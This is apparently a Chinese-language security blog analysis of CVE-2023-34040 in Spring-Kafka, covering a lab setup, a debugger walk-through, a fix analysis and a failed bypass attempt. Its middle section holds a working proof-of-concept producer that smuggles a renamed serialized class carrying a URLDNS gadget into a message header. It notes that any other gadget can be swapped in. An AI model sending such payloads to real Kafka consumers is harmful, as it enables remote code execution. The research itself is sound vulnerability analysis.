当受影响版本的 Spring-Kafka Consumer 未对Record配置 ErrorHandlingDeserializer 并设置 checkDeserExWhenKeyNull 或 checkDeserExWhenValueNull 为 true 且攻击者可以发布 Kafka 消息时,将会存在Java反序列化漏洞。只需发布 key 或 value 为 null 的消息,且在相应的header中放入序列化数据,便可以任意反序列化
Spring-Kafka
Spring-Kafka 、 kafka-clients 和 Spring Boot 的版本对应关系参考官方文档: https://spring.io/projects/spring-kafka#overview
Kafka 可以使用 ZooKeeper 或以 KRaft 模式启动,这里用 Docker 以 KRaft 模式启动Kafka:
1 2 3 4 5 6 7 8
| docker run --rm -d --name kafka-server --hostname localhost -p 9092:9092 \ -e KAFKA_CFG_NODE_ID=0 \ -e KAFKA_CFG_PROCESS_ROLES=controller,broker \ -e KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093 \ -e KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT \ -e KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@localhost:9093 \ -e KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER \ bitnami/kafka:3.5.1
|
IDEA中创建maven项目,添加依赖
1 2 3 4 5 6 7 8 9 10
| <dependency> <groupId>org.springframework.kafka</groupId> <artifactId>spring-kafka</artifactId> <version>2.9.10</version> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> <version>2.7.8</version> </dependency>
|
参考https://docs.spring.io/spring-kafka/docs/2.9.10/reference/html/#getting-started 写出消费者和生产者的Demo:
1 2 3
| spring: kafka: bootstrap-servers: 127.0.0.1:9092
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| package org.example;
import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.kafka.annotation.KafkaListener;
@SpringBootApplication public class Application {
public static void main(String[] args) { SpringApplication.run(Application.class, args); }
@KafkaListener(id = "myId", topics = "myTopic") public void listen(String in) { System.out.println(in); }
}
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| package org.example;
import org.springframework.beans.factory.annotation.Autowired; import org.springframework.kafka.core.KafkaTemplate; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RestController;
@RestController public class Controller {
@Autowired private KafkaTemplate<Object, Object> template;
@GetMapping(path = "/send") public void send() { this.template.send("myTopic", "hello"); }
}
|
漏洞分析
参考官方公告: https://spring.io/security/cve-2023-34040 ,漏洞影响组件及版本为 Spring for Apache Kafka 2.8.1 to 2.9.10、3.0.0 to 3.0.9,利用条件如下:
- 没有为 Record 的 key 或 value 设置 ErrorHandlingDeserializer
- 将 checkDeserExWhenKeyNull 或 checkDeserExWhenValueNull 设置为 true
- 允许不受信任的源发布Kafka主题
漏洞在Consumer侧触发,修改Consumer,以设置 checkDeserExWhenKeyNull 和 checkDeserExWhenValueNull:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45
| package org.example;
import org.apache.kafka.clients.consumer.ConsumerConfig; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.boot.autoconfigure.kafka.KafkaProperties; import org.springframework.context.annotation.Bean; import org.springframework.kafka.annotation.KafkaListener; import org.springframework.kafka.config.ConcurrentKafkaListenerContainerFactory; import org.springframework.kafka.core.DefaultKafkaConsumerFactory; import org.apache.kafka.common.serialization.StringDeserializer; import java.util.HashMap; import java.util.Map;
@SpringBootApplication public class Application {
public static void main(String[] args) { SpringApplication.run(Application.class, args); }
@KafkaListener(id = "myId", topics = "myTopic") public void listen(String in) { System.out.println(in); }
@Autowired private KafkaProperties kafkaProperties;
@Bean public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() { Map<String, Object> props = new HashMap<>(); props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, kafkaProperties.getBootstrapServers()); props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class); props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);
ConcurrentKafkaListenerContainerFactory<String, String> factory = new ConcurrentKafkaListenerContainerFactory<>(); factory.setConsumerFactory(new DefaultKafkaConsumerFactory<>(props)); factory.getContainerProperties().setCheckDeserExWhenKeyNull(true); factory.getContainerProperties().setCheckDeserExWhenValueNull(true); return factory; }
}
|
同时修改Producer,以自定义key、value和header
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| package org.example;
import org.apache.kafka.clients.producer.ProducerRecord; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.kafka.core.KafkaTemplate; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RestController;
@RestController public class Controller { @Autowired private KafkaTemplate<Object, Object> template;
@GetMapping(path = "/send") public void send() { ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic","key",null); this.template.send(producerRecord); } }
|
由 checkDeserExWhenKeyNull 和 checkDeserExWhenValueNull 名称可知当这两项配置为true,并且Record的key或value为null的时候会触发反序列化,所以以上代码中,我设置了value部分为null
在org.springframework.kafka.listener.ListenerUtils#getExceptionFromHeader
设置断点,并用Producer发送消息
当value为null时,会取header中的springDeserializerExceptionValue
,接着修改Producer的代码,添加header,再次发送消息
1 2 3 4 5
| public void send() { ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic","key",null); producerRecord.headers().add("springDeserializerExceptionValue", "leixiao".getBytes()); this.template.send(producerRecord); }
|
最终会在org.springframework.kafka.listener.ListenerUtils#byteArrayToDeserializationException
进行反序列化
这里使用了resolveClass
对反序列化的类进行了限制,限制类名只能是org.springframework.kafka.support.serializer.DeserializationException
,但是通过this.first
字段实现只检查一次反序列化类名,所以该类如果有其他类型的字段,或者嵌套着其他对象的序列化数据,那仍然是可以正常反序列化的
为了构造顶层类为org.springframework.kafka.support.serializer.DeserializationException
并且嵌套着其他对象的序列化数据,我们可以先建一个类名为xrg.springframework.kafka.support.serializer.DeserializationException
的类,然后在其字段里自由构造,最后直接修改序列化数据中的类名,如下POC:
1 2 3 4 5 6 7 8 9 10 11
| package xrg.springframework.kafka.support.serializer;
import java.io.Serializable;
public class DeserializationException implements Serializable { private static final long serialVersionUID = 8280022391259546509L; private Object foo; public DeserializationException(Object foo) { this.foo = foo; } }
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61
| package org.example;
import org.apache.kafka.clients.producer.ProducerRecord; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.kafka.core.KafkaTemplate; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RestController; import java.io.*; import java.lang.reflect.Field; import java.net.InetAddress; import java.net.URL; import java.net.URLConnection; import java.net.URLStreamHandler; import java.util.HashMap;
@RestController public class Controller { @Autowired private KafkaTemplate<Object, Object> template;
@GetMapping(path = "/send") public void send() throws Exception { ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic","key",null); producerRecord.headers().add("springDeserializerExceptionValue", getPOC()); this.template.send(producerRecord); }
public static byte[] getPOC() throws Exception { Object urldns = getURLDNS("http://leixiao.cff03fad.dnslog.store"); Object o =new xrg.springframework.kafka.support.serializer.DeserializationException(urldns); byte[] data = serialize(o); data[8] = "o".getBytes()[0]; return data; }
public static Object getURLDNS(final String url) throws Exception { URLStreamHandler handler = new SilentURLStreamHandler(); HashMap<URL,String> hashMap = new HashMap<URL,String>(); URL u = new URL(null, url, handler); hashMap.put(u, url); Field hashcode = u.getClass().getDeclaredField("hashCode"); hashcode.setAccessible(true); hashcode.set(u,-1); return hashMap; } static class SilentURLStreamHandler extends URLStreamHandler { protected URLConnection openConnection(URL u) throws IOException { return null; } protected synchronized InetAddress getHostAddress(URL u) { return null; } } public static byte[] serialize(final Object obj) throws Exception { ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); ObjectOutputStream objectOutputStream= new ObjectOutputStream(byteArrayOutputStream); objectOutputStream.writeObject(obj); return byteArrayOutputStream.toByteArray(); }
}
|
这里构造了URLDNS的POC,当然如果存在其他Gadget,都是可以按这个方法构造的
漏洞修复
把spring-kafka 版本换到 2.9.11,重新运行一下POC,报错...[Payload value must not be empty]...
,可能是新版不允许value为null的情况了?试着让key为null:
1 2
| ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic",null,"value"); producerRecord.headers().add("springDeserializerExceptionKey", getPOC());
|
运行POC,此时代码也无法执行到org.springframework.kafka.listener.ListenerUtils#getExceptionFromHeader
了,而且控制台提示如下:
1 2
| WARN 62418 --- [ myId-0-C-1] o.s.k.l.KafkaMessageListenerContainer : Foreign deserialization exception header in (myTopic-0@10) ignored; possible attack? value
|
具体逻辑在org.springframework.kafka.support.serializer.SerializationUtils#getExceptionFromHeader
可见,只有当header为DeserializationExceptionHeader
才能继续执行,但是我们的header类型是RecordHeader
,我想过在Producer中反射修改header的类型去绕过:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| Class<?> exceptionHeaderClass = Class.forName("org.springframework.kafka.support.serializer.DeserializationExceptionHeader"); Constructor<?> exceptioHeaderConstructor = exceptionHeaderClass.getDeclaredConstructors()[0]; exceptioHeaderConstructor.setAccessible(true); Header exceptionHeader = (Header) exceptioHeaderConstructor.newInstance("springDeserializerExceptionKey", getPOC()); Header[] headers = new Header[]{exceptionHeader};
ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic",null,"value");
Field headersField =producerRecord.getClass().getDeclaredField("headers"); headersField.setAccessible(true); Field modifersField = Field.class.getDeclaredField("modifiers"); modifersField.setAccessible(true); modifersField.setInt(headersField, headersField.getModifiers() & ~Modifier.FINAL); headersField.set(producerRecord,new RecordHeaders(headers));
this.template.send(producerRecord);
|
但是Consumer收到的Record中的header类型还是RecordHeader
,后面用Wireshark抓包看了下,两种header的类型并未在数据包中有体现,数据包中只有header的键值对,换句话说,Consumer收到的Header类型应该不是Producer可控的
后面通过在RecordHeader
构造函数设置断点找到了Consumer构造Record的地方:org.apache.kafka.common.record.DefaultRecord#readFrom(java.nio.ByteBuffer, int, int, long, long, int, java.lang.Long)
构造header位置:org.apache.kafka.common.record.DefaultRecord#readHeaders
很可惜,从这里代码来看,header只能是RecordHeader
详细修复代码见:https://github.com/spring-projects/spring-kafka/pull/2770/files
参考
https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040